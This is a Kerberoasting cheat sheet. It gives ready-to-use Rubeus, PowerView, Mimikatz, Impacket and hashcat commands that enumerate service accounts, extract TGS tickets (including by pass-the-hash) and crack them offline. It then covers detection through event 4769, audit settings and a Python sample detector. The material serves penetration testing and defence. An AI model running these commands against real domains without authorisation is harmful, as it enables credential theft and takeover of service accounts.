Quick reference for performing and cracking Kerberoasting attacks from Windows and Linux.
| Command | Platform | Description |
|---|---|---|
| `setspn.exe -Q */*` | Windows (CMD) | List all SPNs in the domain |
| `Get-DomainUser * -spn \| select samaccountname` | Windows (PowerView) | List SPN user accounts |
| `.\Rubeus.exe kerberoast /stats` | Windows (Rubeus) | Kerberoastable account stats without requesting tickets |
| `GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER>` | Linux (Impacket) | List SPN accounts remotely |
```powershell
# Request a single TGS ticket
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/host.domain.local:1433"
```

```text
# Export from memory with Mimikatz
mimikatz # base64 /out:true
mimikatz # kerberos::list /export
```
```powershell
Import-Module .\PowerView.ps1
# Single user
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
# All SPN accounts to CSV
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\tgs.csv -NoTypeInformation
```
```powershell
# All kerberoastable accounts
.\Rubeus.exe kerberoast /nowrap
# High-value targets only (admincount=1)
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
# Specific user
.\Rubeus.exe kerberoast /user:sqldev /nowrap
# Force RC4 (pre-Server 2019 DCs only)
.\Rubeus.exe kerberoast /tgtdeleg /nowrap
# OPSEC-safe: tgtdeleg + skip AES-only accounts
.\Rubeus.exe kerberoast /rc4opsec /nowrap
# With alternate creds
.\Rubeus.exe kerberoast /creduser:DOMAIN\USER /credpassword:PASS /nowrap
# Filter by password age
.\Rubeus.exe kerberoast /pwdsetafter:01-31-2020 /pwdsetbefore:12-31-2022 /nowrap
# Output to file
.\Rubeus.exe kerberoast /outfile:hashes.txt /nowrap
```
```bash
# Enumerate SPN accounts (shows group membership, password age)
GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER>
# Request all TGS hashes
GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request
# Request TGS for a specific user
GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request-user <SPN_USER>
# Save hashes to file
GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request -outputfile tgs_hashes.txt
# Single user to file
GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request-user <SPN_USER> -outputfile user_tgs.txt
# Authenticate with NTLM hash instead of password
GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -hashes :<NTLM_HASH> -request
```
| Encryption | Hashcat Mode | Hash Prefix | Speed |
|---|---|---|---|
| RC4 (type 23) | 13100 | `$krb5tgs$23$*` | Fast |
| AES-128 (type 17) | 19600 | `$krb5tgs$17$*` | Slow |
| AES-256 (type 18) | 19700 | `$krb5tgs$18$*` | Very slow |
```bash
# RC4
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
# AES-256
hashcat -m 19700 hashes.txt /usr/share/wordlists/rockyou.txt
```

```bash
# Base64 to .kirbi
echo "<base64>" | tr -d \\n | base64 -d > ticket.kirbi
# Extract hash
python2.7 kirbi2john.py ticket.kirbi
# Format for Hashcat
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > hash_for_hashcat
```
```powershell
Get-DomainUser <USER> -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes
```

| msDS-SupportedEncryptionTypes | Meaning |
|---|---|
| 0 | Default (RC4) |
| 24 | AES 128/256 only |
```bash
# Confirm access with CrackMapExec (look for "Pwn3d!" = admin access)
sudo crackmapexec smb <DC_IP> -u <USER> -p '<PASSWORD>'
```

| Event ID | Description |
|---|---|
| 4769 | Kerberos service ticket requested |
| 4770 | Kerberos service ticket renewed |
Enable via GPO: Advanced Audit Policy Configuration > Account Logon > Audit Kerberos Service Ticket Operations.
Anomaly indicators: a burst of 4769 events from a single account requesting tickets for many distinct service accounts in a short window, and Ticket Encryption Type 0x17 (RC4) when AES is the norm.
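Detection logic for the indicators above, as an added example that is not from the original cheat sheet: it sweeps 4769 records for accounts that request tickets for many distinct user service accounts inside a short window and reports how many of those requests used RC4. The event records, the window and the thresholds are constructed assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample 4769 events: (timestamp, Account Name, Service Name, Ticket Encryption Type).
# In 4769 the Service Name is the service account's sAMAccountName; a trailing "$" marks a computer account.
SAMPLE_4769 = [
    ("2024-03-01T09:00:01", "jdoe", "FS01$", "0x12"),
    ("2024-03-01T09:00:05", "jdoe", "WEB01$", "0x12"),
    ("2024-03-01T09:15:00", "bob", "sqldev", "0x17"),
    ("2024-03-01T09:15:01", "bob", "svc_http", "0x17"),
    ("2024-03-01T09:15:01", "bob", "svc_backup", "0x17"),
    ("2024-03-01T09:15:02", "bob", "svc_sccm", "0x17"),
    ("2024-03-01T09:15:02", "bob", "svc_exch", "0x17"),
    ("2024-03-01T09:15:03", "bob", "svc_ldap", "0x17"),
    ("2024-03-01T10:00:00", "svc_monitor", "sqldev", "0x12"),
    ("2024-03-01T11:00:00", "svc_monitor", "svc_http", "0x12"),
    ("2024-03-01T12:00:00", "svc_monitor", "svc_backup", "0x12"),
    ("2024-03-01T13:00:00", "svc_monitor", "svc_sccm", "0x12"),
    ("2024-03-01T14:00:00", "svc_monitor", "svc_exch", "0x12"),
]

RC4_ETYPE = "0x17"  # Ticket Encryption Type value for RC4-HMAC (etype 23)

def detect_kerberoast(events, window=timedelta(minutes=5), min_services=5, rc4_ratio=0.5):
    """Return [(account, distinct_services, rc4_count)] for every account that requested
    tickets for at least `min_services` distinct user service accounts within one `window`,
    with at least `rc4_ratio` of those requests using RC4. Thresholds are assumptions."""
    by_acct = defaultdict(list)
    for ts, acct, svc, etype in events:
        if svc.endswith("$"):  # computer-account services are not Kerberoast targets
            continue
        by_acct[acct].append((datetime.fromisoformat(ts), svc, etype.lower()))
    alerts = []
    for acct, reqs in sorted(by_acct.items()):
        reqs.sort()
        for i, (t0, _, _) in enumerate(reqs):  # sliding window starting at each request
            inwin = [r for r in reqs[i:] if r[0] - t0 <= window]
            services = {svc for _, svc, _ in inwin}
            rc4 = sum(1 for _, _, e in inwin if e == RC4_ETYPE)
            if len(services) >= min_services and rc4 / len(inwin) >= rc4_ratio:
                alerts.append((acct, len(services), rc4))
                break  # one alert per account is enough
    return alerts

if __name__ == "__main__":
    for acct, n, rc4 in detect_kerberoast(SAMPLE_4769):
        print(f"ALERT {acct}: {n} distinct service tickets, {rc4} via RC4")
```

With the sample data only `bob` is reported: `svc_monitor` touches the same five services but spread over hours, and `jdoe` only requested tickets for computer accounts.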